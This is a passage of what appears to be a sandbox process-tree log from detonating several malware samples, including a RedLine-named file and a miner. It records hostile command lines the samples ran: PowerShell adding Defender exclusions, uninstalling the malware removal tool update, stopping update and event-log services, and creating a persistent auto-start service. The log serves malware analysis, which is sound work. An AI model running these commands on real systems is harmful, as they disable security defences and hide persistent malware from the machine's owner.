C:\Windows\SysWOW64\cmd.exe"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsu7274.tmp\abc.bat"3⤵PID:7832
-
-
-
C:\Users\Admin\Desktop\Files\redline123123.exe"C:\Users\Admin\Desktop\Files\redline123123.exe"2⤵PID:7600
-
-
C:\Users\Admin\Desktop\Files\pt.exe"C:\Users\Admin\Desktop\Files\pt.exe"2⤵PID:6020
-
C:\Windows\system32\cmd.exe"cmd" /C tasklist3⤵PID:5452
-
C:\Windows\system32\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
PID:7776
-
-
-
-
C:\Users\Admin\Desktop\Files\output.exe"C:\Users\Admin\Desktop\Files\output.exe"2⤵PID:3356
-
-
C:\Users\Admin\Desktop\Files\services64.exe"C:\Users\Admin\Desktop\Files\services64.exe"2⤵PID:6224
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:6340
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵PID:2468
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵PID:7124
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵PID:1612
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:6364
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:7180
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
PID:4284
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
PID:4400
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
PID:5640
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Power Settings
PID:8108
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Power Settings
PID:6748
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Power Settings
PID:2208
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Power Settings
PID:6672
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵PID:6084
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "WindowsAutHost"3⤵PID:6788
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "WindowsAutHost" binpath= "C:\ProgramData\WindowsServices\WindowsAutHost" start= "auto"3⤵PID:7676
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:8052
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "WindowsAutHost"3⤵
- Launches sc.exe
PID:8172
-
-
-
C:\Users\Admin\Desktop\Files\hellminer.exe"C:\Users\Admin\Desktop\Files\hellminer.exe"2⤵PID:4884
-
C:\Users\Admin\Desktop\Files\hellminer.exe"C:\Users\Admin\Desktop\Files\hellminer.exe"3⤵PID:7288
-
-
-
C:\Users\Admin\Desktop\Files\npp.exe"C:\Users\Admin\Desktop\Files\npp.exe"2⤵PID:1712
-
C:\Users\Admin\AppData\Local\Temp\1796026790.exeC:\Users\Admin\AppData\Local\Temp\1796026790.exe3⤵PID:4928
-
C:\Windows\sysmablsvr.exeC:\Windows\sysmablsvr.exe4⤵PID:4216
-
C:\Users\Admin\AppData\Local\Temp\243032482.exeC:\Users\Admin\AppData\Local\Temp\243032482.exe5⤵PID:6884
-
-
-
-
-
C:\Users\Admin\Desktop\Files\drivermanager.exe"C:\Users\Admin\Desktop\Files\drivermanager.exe"2⤵PID:1996
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 9843⤵
- Program crash
PID:4640
-
-
-
C:\Users\Admin\Desktop\Files\11.exe"C:\Users\Admin\Desktop\Files\11.exe"2⤵PID:7580
-
-
C:\Users\Admin\Desktop\Files\cluton.exe"C:\Users\Admin\Desktop\Files\cluton.exe"2⤵PID:6780
-
-
C:\Users\Admin\Desktop\Files\motruhjgmawes.exe"C:\Users\Admin\Desktop\Files\motruhjgmawes.exe"2⤵PID:1232
-
-
C:\ProgramData\ajdiewdhnaew\wfbrmcwrltkl.exeC:\ProgramData\ajdiewdhnaew\wfbrmcwrltkl.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:5888 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5856
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5840
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
PID:5852
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
PID:2116
-
-
C:\Windows\explorer.exeexplorer.exe2⤵PID:5976
-
-
C:\ProgramData\agmxykvocxft\etuamactyjne.exeC:\ProgramData\agmxykvocxft\etuamactyjne.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:2364 -
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:5612
-
C:\ProgramData\agmxykvocxft\etuamactyjne.exe"C:\ProgramData\agmxykvocxft\etuamactyjne.exe"3⤵PID:4916
-
C:\Windows\system32\conhost.execonhost.exe4⤵PID:7588
-
-
-
C:\ProgramData\agmxykvocxft\etuamactyjne.exe"C:\ProgramData\agmxykvocxft\etuamactyjne.exe"3⤵PID:3524
-
C:\Windows\system32\conhost.execonhost.exe4⤵PID:4392
-
-
-
C:\ProgramData\agmxykvocxft\etuamactyjne.exe"C:\ProgramData\agmxykvocxft\etuamactyjne.exe"3⤵PID:7576
-
C:\Windows\system32\conhost.execonhost.exe4⤵PID:620
-
-
-
-
C:\Windows\system32\conhost.execonhost.exe2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3432
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1008 -
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /12⤵PID:2436
-
-
C:\ProgramData\dnbdcucuyzqs\pseaptzkxyms.exeC:\ProgramData\dnbdcucuyzqs\pseaptzkxyms.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:5780 -
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:5864
-
-
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe1⤵
- Executes dropped EXE
PID:6232
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 6840 -ip 68401⤵PID:2576
-
C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"1⤵
- Executes dropped EXE
PID:5632 -
C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"2⤵
- Executes dropped EXE
- Enumerates connected drives
- Checks processor information in registry
PID:1824 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1824 -s 15843⤵
- Program crash
PID:8104
-
-
-
C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"2⤵
- Executes dropped EXE
PID:4904 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4904 -s 5523⤵
- Program crash
PID:2640
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5632 -s 5682⤵
- Program crash
PID:3308
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3188 -ip 31881⤵PID:5608
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5632 -ip 56321⤵PID:5660
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4904 -ip 49041⤵PID:872
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1408 -ip 14081⤵PID:6344
-
C:\ProgramData\rstywrmdprzs\esfowblknspo.exeC:\ProgramData\rstywrmdprzs\esfowblknspo.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:6760 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4900
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:4088
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:6900
-
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:2996
-
-
C:\ProgramData\ytdcogcfuxoe\wsfekkbdzjcc.exeC:\ProgramData\ytdcogcfuxoe\wsfekkbdzjcc.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:1708 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4928
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:5340
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:5904
-
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:5880
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
PID:6856
-
-
C:\ProgramData\ytdcogcfuxoe\wsfekkbdzjcc.exe"C:\ProgramData\ytdcogcfuxoe\wsfekkbdzjcc.exe"3⤵PID:6220
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
PID:5980
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:4088
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:5892
-
-
-
C:\Windows\system32\conhost.execonhost.exe4⤵PID:6324
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:6348
-
-
-
C:\Windows\system32\conhost.execonhost.exe2⤵PID:2292
-
-
C:\ProgramData\wikombernizc\reakuqnanrkn.exeC:\ProgramData\wikombernizc\reakuqnanrkn.exe1⤵PID:6524
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
PID:5076
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:4964
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:6816
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:5840
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵PID:2992
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵PID:1948
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵PID:5868
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:3732
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
PID:1216
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
PID:5156
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
PID:6676
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
PID:5464 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6904
-
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:6920
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:6540
-
-
C:\ProgramData\wikombernizc\reakuqnanrkn.exe"C:\ProgramData\wikombernizc\reakuqnanrkn.exe"3⤵PID:4276
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
PID:5220
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:5396
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:5172
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:1000
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:4472
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:812
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:5552
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:6576
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
PID:1980
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
PID:6912
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
PID:3328
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
PID:1720
-
-
C:\Windows\explorer.exeexplorer.exe4⤵PID:6356
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:440
-
-
C:\ProgramData\wikombernizc\reakuqnanrkn.exe"C:\ProgramData\wikombernizc\reakuqnanrkn.exe"3⤵PID:4476
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
PID:2944
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:2596
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:6704
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:5328
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵PID:4556
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:3164
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:648
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:396
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
PID:5672
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
PID:1940
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
PID:6472
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
PID:6456
-
-
C:\Windows\explorer.exeexplorer.exe4⤵PID:7012
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:4532 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:6804
-
-
-
C:\ProgramData\wikombernizc\reakuqnanrkn.exe"C:\ProgramData\wikombernizc\reakuqnanrkn.exe"3⤵PID:5008
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
PID:4328
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:6600
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:5684
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:4604
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵PID:6972
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
PID:5696
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:7568
-
-
C:\ProgramData\wikombernizc\reakuqnanrkn.exe"C:\ProgramData\wikombernizc\reakuqnanrkn.exe"3⤵PID:1628
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
PID:6044
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:7268
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:4416
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵PID:8128
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:2328
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:2764
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵PID:2404
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:6544
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
PID:8060
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
PID:8160
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
PID:6580
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
PID:2140
-
-
C:\Windows\explorer.exeexplorer.exe4⤵PID:7860
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:8108
-
-
C:\ProgramData\wikombernizc\reakuqnanrkn.exe"C:\ProgramData\wikombernizc\reakuqnanrkn.exe"3⤵PID:812
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
PID:8072
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:4416
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:6560
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵PID:932
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:7548
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:7436
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:864
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:7672
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
PID:6512
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
PID:4376
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
PID:6588
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
PID:7020
-
-
C:\Windows\explorer.exeexplorer.exe4⤵PID:6960
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:5312
-
-
C:\ProgramData\wikombernizc\reakuqnanrkn.exe"C:\ProgramData\wikombernizc\reakuqnanrkn.exe"3⤵PID:7832
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
PID:4488
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:7564
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:4392
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:2664
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:4604
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵PID:5860
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:7464
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:7148
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
PID:7980
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
PID:6292
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
PID:4416
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
PID:4548
-
-
C:\Windows\explorer.exeexplorer.exe4⤵PID:1292
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:7652
-
-
C:\ProgramData\wikombernizc\reakuqnanrkn.exe"C:\ProgramData\wikombernizc\reakuqnanrkn.exe"3⤵PID:6520
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
PID:4892
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:8024
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:7832
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:7476
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵PID:7808
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:7288
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵PID:1668
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:3308
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
PID:4560
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
PID:6868
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
PID:8080
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
PID:5748
-
-
C:\Windows\explorer.exeexplorer.exe4⤵PID:7512
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:6740
-
-
